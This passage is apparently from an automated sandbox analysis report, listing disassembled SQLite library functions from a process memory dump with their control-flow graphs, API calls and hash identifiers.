                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcmp$sqlite3_mutex_try
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 2794522359-4108050209
                                                                                                              • Opcode ID: 5ed16f86a59463aabcc951d3e907a0842d206bd7774ab0ad4bc6fd959a77f382
                                                                                                              • Instruction ID: 6c19f7d6379cac908fff080b0d47af8c351b558462f8d3e6343380c27459ba64
                                                                                                              • Opcode Fuzzy Hash: 5ed16f86a59463aabcc951d3e907a0842d206bd7774ab0ad4bc6fd959a77f382
                                                                                                              • Instruction Fuzzy Hash: 51127870A082558FEB15CFA8D484BD9BBF0AF98308F24C5A9E855DB392D774E885CF50
                                                                                                              Function 61E63C32 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 181COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 772 61e63c32-61e63c4a 773 61e63c63-61e63c66 call 61e63785 772->773 774 61e63c4c-61e63c5b call 61e03955 772->774 778 61e63c6b-61e63c6d 773->778 779 61e63c61-61e63c7b 774->779 780 61e63e1f-61e63e23 774->780 778->774 781 61e63c6f 778->781 786 61e63e10-61e63e14 779->786 787 61e63c81-61e63c93 call 61e01f49 779->787 784 61e63e25-61e63e2c 780->784 785 61e63e8e-61e63e95 780->785 783 61e63e6a-61e63e6c 781->783 783->785 784->785 788 61e63e2e-61e63e43 784->788 786->783 789 61e63e16-61e63e1d 786->789 796 61e63c95-61e63cb2 sqlite3_strnicmp 787->796 797 61e63cf9-61e63d09 787->797 791 61e63e45-61e63e65 call 61e292f0 788->791 792 61e63e6e-61e63e8c call 61e292f0 788->792 789->788 791->783 792->783 796->786 801 61e63cb8-61e63cc5 call 61e03ed7 796->801 799 61e63d13-61e63d1b 797->799 800 61e63d0b-61e63d0e 797->800 802 61e63d1d-61e63d23 799->802 803 61e63d29-61e63d40 call 61e11aa4 799->803 800->785 801->786 808 61e63ccb-61e63ccf 801->808 802->786 802->803 803->786 810 61e63d46-61e63d54 call 61e11e6d 803->810 808->786 809 61e63cd5-61e63cf3 call 61e1336b 808->809 809->786 809->797 815 61e63d56-61e63d5f call 61e0f942 810->815 816 61e63d64-61e63dcd call 61e11e6d call 61e206da * 2 call 61e11e6d call 61e206da call 61e2d2fa 810->816 815->786 816->800 831 61e63dd3-61e63dfc call 61e292f0 call 61e0f942 816->831 831->786 836 61e63dfe-61e63e09 call 61e1550d 831->836 836->786
                                                                                                              APIs
                                                                                                              • sqlite3_strnicmp.SQLITE3 ref: 61E63CAB
                                                                                                                • Part of subcall function 61E03ED7: sqlite3_stricmp.SQLITE3 ref: 61E03F0C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_stricmpsqlite3_strnicmp
                                                                                                              • String ID: no such table$no such view
                                                                                                              • API String ID: 456569458-301769730
                                                                                                              • Opcode ID: 0fbb3ff2c7f5a02b90848f1cdd3611e53906e71844e905e555df9113e5e5e5ec
                                                                                                              • Instruction ID: a8e0e9edd152b68eee42def08ff8a31a4a7c7e0e4677239ae18e48ee117670e4
                                                                                                              • Opcode Fuzzy Hash: 0fbb3ff2c7f5a02b90848f1cdd3611e53906e71844e905e555df9113e5e5e5ec
                                                                                                              • Instruction Fuzzy Hash: B1712370A483459BDB04CFA9C880B4ABBFABF89308F64C82DE8599B355D734D851CB91
                                                                                                              Function 61E263F2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106fileCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1010 61e263f2-61e2641a 1011 61e26464-61e26483 1010->1011 1012 61e2641c 1010->1012 1015 61e26486-61e264ad ReadFile 1011->1015 1013 61e26423-61e26432 1012->1013 1014 61e2641e-61e26421 1012->1014 1016 61e26447-61e26461 1013->1016 1017 61e26434 1013->1017 1014->1011 1014->1013 1018 61e264c8-61e264d1 1015->1018 1019 61e264af-61e264c2 call 61e25f0a 1015->1019 1016->1011 1020 61e26436-61e26438 1017->1020 1021 61e2643a-61e26445 1017->1021 1018->1019 1027 61e264d3-61e264e0 call 61e185e6 1018->1027 1024 61e264c4-61e264c6 1019->1024 1028 61e26507-61e26513 1019->1028 1020->1016 1020->1021 1021->1024 1026 61e26518-61e2651f 1024->1026 1027->1015 1031 61e264e2-61e26505 call 61e254c7 1027->1031 1028->1026 1031->1026
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileRead
                                                                                                              • String ID: winRead
                                                                                                              • API String ID: 2738559852-2759563040
                                                                                                              • Opcode ID: 3f93d09187f2af1fc2446ced1509e383606236e4975ebb1f636e43147f67869b
                                                                                                              • Instruction ID: 31cea667895dd336cc7c2e2ae5cf513e652dc955f815e8708f6abe00e0b0d86b
                                                                                                              • Opcode Fuzzy Hash: 3f93d09187f2af1fc2446ced1509e383606236e4975ebb1f636e43147f67869b
                                                                                                              • Instruction Fuzzy Hash: 4A41D271A01299DBCF44CFA8D89058EBBF2FF88314F65C629EC58A7344D730E9528B91
                                                                                                              Function 61E10BF1 Relevance: 3.1, APIs: 2, Instructions: 78COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1034 61e10bf1-61e10c07 1035 61e10c0d-61e10c13 1034->1035 1036 61e10cec 1034->1036 1035->1036 1037 61e10c19-61e10c22 1035->1037 1038 61e10cee-61e10cf5 1036->1038 1039 61e10ce1-61e10cea 1037->1039 1040 61e10c28-61e10c46 sqlite3_mutex_enter 1037->1040 1039->1038 1043 61e10c48 1040->1043 1044 61e10c4e-61e10c5d 1040->1044 1043->1044 1045 61e10ca1-61e10ca4 call 61e265e6 1044->1045 1046 61e10c5f 1044->1046 1049 61e10caa-61e10cae 1045->1049 1047 61e10c61-61e10c64 1046->1047 1048 61e10c66-61e10c7d 1046->1048 1047->1045 1047->1048 1050 61e10c97 1048->1050 1051 61e10c7f 1048->1051 1052 61e10cd0-61e10cdf sqlite3_mutex_leave 1049->1052 1053 61e10cb0-61e10ccb call 61e0178f call 61e0149c * 2 1049->1053 1050->1045 1054 61e10c81-61e10c84 1051->1054 1055 61e10c86-61e10c95 call 61e09d45 1051->1055 1052->1038 1053->1052 1054->1050 1054->1055 1055->1045
                                                                                                              APIs
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E10C30
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E10CD8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                              • String ID:
                                                                                                              • API String ID: 1477753154-0
                                                                                                              • Opcode ID: d1a762c95fc12d369821e2391bfc047a24cb4e8f9bd99dfb06df9921a6f23563
                                                                                                              • Instruction ID: e69b2ff03aa7064101020bd6fd507057f3620fef74c92f0b5a47c9470994e91e
                                                                                                              • Opcode Fuzzy Hash: d1a762c95fc12d369821e2391bfc047a24cb4e8f9bd99dfb06df9921a6f23563
                                                                                                              • Instruction Fuzzy Hash: EC219131E24B098BDB049FB9888531D7AE5BB8A319F25C62AD854C7384D7B8C8D58F41
                                                                                                              Function 61E265E6 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1064 61e265e6-61e265fd malloc 1065 61e265ff-61e2660a 1064->1065 1066 61e2660c-61e26627 sqlite3_log 1064->1066 1067 61e2662a-61e2662f 1065->1067 1066->1067
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: mallocsqlite3_log
                                                                                                              • String ID:
                                                                                                              • API String ID: 2785431543-0
                                                                                                              • Opcode ID: d652ba3079bf7203cdeef8e83ccd182aa24d03a41ad00688b72ce323f99eb7a8
                                                                                                              • Instruction ID: 98f6a4d553f47c83d953c4b5c6f5a8e1531af5f8d98df04f62bcf572040169dd
                                                                                                              • Opcode Fuzzy Hash: d652ba3079bf7203cdeef8e83ccd182aa24d03a41ad00688b72ce323f99eb7a8
                                                                                                              • Instruction Fuzzy Hash: 93F039B0C08349DFDB109FA5C9D5609BFE8EF44248F14C86DE8888F201E276E580CB51
                                                                                                              Function 61E1427E Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1068 61e1427e-61e1428f 1069 61e14291-61e14293 1068->1069 1070 61e14295-61e14298 1069->1070 1071 61e1429a-61e142a0 1069->1071 1070->1069 1072 61e142a2-61e142a4 1071->1072 1073 61e142a6-61e142a9 1072->1073 1074 61e142ab-61e142bc 1072->1074 1073->1072 1075 61e142c2-61e142ce 1074->1075 1076 61e143d8-61e143df 1074->1076 1077 61e142d0-61e142d9 sqlite3_free 1075->1077 1078 61e142de-61e142f3 1075->1078 1077->1078 1079 61e14331-61e14333 1078->1079 1080 61e142f5-61e142f7 1078->1080 1081 61e14335-61e14358 1079->1081 1080->1079 1082 61e142f9-61e142fe 1080->1082 1083 61e1435a-61e14366 1081->1083 1084 61e143af-61e143ce 1081->1084 1082->1081 1085 61e14300-61e1430b call 61e016d8 call 61e10bf1 1082->1085 1086 61e14368-61e1436c 1083->1086 1084->1076 1092 61e14310-61e1431d call 61e016e9 1085->1092 1088 61e14383-61e143ad 1086->1088 1089 61e1436e-61e14381 1086->1089 1088->1076 1089->1086 1092->1081 1095 61e1431f-61e1432f call 61e0178f 1092->1095 1095->1081
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 2313487548-0
                                                                                                              • Opcode ID: 8a90d49335c7b740a76a0f90a32c943ba89b9a0eacc0c710391df000a3c29c6b
                                                                                                              • Instruction ID: ad8d0af2ea475127421b908b3b18300512d6fd1694fcdcb500df7c75cd848d85
                                                                                                              • Opcode Fuzzy Hash: 8a90d49335c7b740a76a0f90a32c943ba89b9a0eacc0c710391df000a3c29c6b
                                                                                                              • Instruction Fuzzy Hash: 9541A2729092258BDF098FA9C4813DA7BB0BF88708F19817ECC59AF349D775D841CBA0

                                                                                                              Non-executed Functions

                                                                                                              Function 61E23631 Relevance: 10.7, APIs: 7, Instructions: 247COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E23686
                                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E236A6
                                                                                                              • sqlite3_value_blob.SQLITE3 ref: 61E236B3
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E236CA
                                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E2371A
                                                                                                              • sqlite3_result_text64.SQLITE3 ref: 61E2386A
                                                                                                              • sqlite3_result_blob64.SQLITE3 ref: 61E238C4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_int$sqlite3_result_blob64sqlite3_result_text64sqlite3_value_blobsqlite3_value_bytessqlite3_value_text
                                                                                                              • String ID:
                                                                                                              • API String ID: 3992148849-0
                                                                                                              • Opcode ID: 02d7730d16b993c52aeefd3abfe02df5cda6a1de8f4ba24c2d8e30bac56168d8
                                                                                                              • Instruction ID: 074db29f150df0013ad78b4a2fe9285fc6a8611711c2c2ba8c1388f31fc2db31
                                                                                                              • Opcode Fuzzy Hash: 02d7730d16b993c52aeefd3abfe02df5cda6a1de8f4ba24c2d8e30bac56168d8
                                                                                                              • Instruction Fuzzy Hash: 43915475E046598FDB05CFA8C8A069EFBB1BB8D324F29C219E8649B390D774D8428F51
                                                                                                              Function 61E34CDF Relevance: 7.8, APIs: 5, Instructions: 345COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_malloc64$memcmpsqlite3_freesqlite3_realloc64
                                                                                                              • String ID:
                                                                                                              • API String ID: 1852262425-0
                                                                                                              • Opcode ID: aa59e04c303cc334f6bf6eb164e4889fff8dd9a4c5a8fa3ed90f37aee940d934
                                                                                                              • Instruction ID: 45f7598c1b86e5ef43ee66ff71d7aadc4bfdce3936db82b4782e35b0518b1fed
                                                                                                              • Opcode Fuzzy Hash: aa59e04c303cc334f6bf6eb164e4889fff8dd9a4c5a8fa3ed90f37aee940d934
                                                                                                              • Instruction Fuzzy Hash: DDE12975A04259CFDB04CFA8C48069EBBF2BF89314F29856AEC14AB319D735E951CF90
                                                                                                              Function 61E91E90 Relevance: 7.6, APIs: 5, Instructions: 54timethreadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetSystemTimeAsFileTime.KERNEL32 ref: 61E91EC9
                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E91EDA
                                                                                                              • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E91EE2
                                                                                                              • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E91EEA
                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E91EF9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                              • String ID:
                                                                                                              • API String ID: 1445889803-0
                                                                                                              • Opcode ID: 26d5ac2e118582a54998d729faa6b91bca2f619931e28f0815535295f1daed70
                                                                                                              • Instruction ID: d7d7134573a60a9050a93399c6f2eb12c288e6c97c4fb2242779f831a5277980
                                                                                                              • Opcode Fuzzy Hash: 26d5ac2e118582a54998d729faa6b91bca2f619931e28f0815535295f1daed70
                                                                                                              • Instruction Fuzzy Hash: 5C1191BA9153058FCB00EFB9D48894EBBE4FB89664F05092AE445C7210EB34D8C98792
                                                                                                              Function 61E7675A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 182COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E76773
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E76983
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                              • String ID: BINARY$INTEGER
                                                                                                              • API String ID: 1477753154-1676293250
                                                                                                              • Opcode ID: ea95f4b1e4125ffd23f9944fa7b9136d2fb4b1c7de9ae19d699b905af69ab760
                                                                                                              • Instruction ID: 6fe9d4ef0667bb45708ac12081e0805ede35213e8a91f21d3c33a626de5a137d
                                                                                                              • Opcode Fuzzy Hash: ea95f4b1e4125ffd23f9944fa7b9136d2fb4b1c7de9ae19d699b905af69ab760
                                                                                                              • Instruction Fuzzy Hash: 55710774A046999FFB10CFA9C480B9EBBF1BF88358F25C529E8589B350D734E851CB90
                                                                                                              Function 61E465DE Relevance: 6.4, APIs: 4, Instructions: 422COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E465F3
                                                                                                                • Part of subcall function 61E13D7F: sqlite3_mutex_try.SQLITE3(?,?,?,61E13DFF), ref: 61E13D1F
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E4660C
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E46725
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E46B30
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                                                                              • String ID:
                                                                                                              • API String ID: 2068833801-0
                                                                                                              • Opcode ID: 0938ad3e828ddd95b66b973db430d5058a8d991c1de7630f584ce391ef35a564
                                                                                                              • Instruction ID: e81c969c2244d1e773be60e1998a7901441778cd185ab2ec273044ebc7b2df0b
                                                                                                              • Opcode Fuzzy Hash: 0938ad3e828ddd95b66b973db430d5058a8d991c1de7630f584ce391ef35a564
                                                                                                              • Instruction Fuzzy Hash: 3802F774A042958FDB08CFA9D490A9DBBF2BF8C318F25C069E845AB355DB74EC41CB51
                                                                                                              Function 61E28892 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
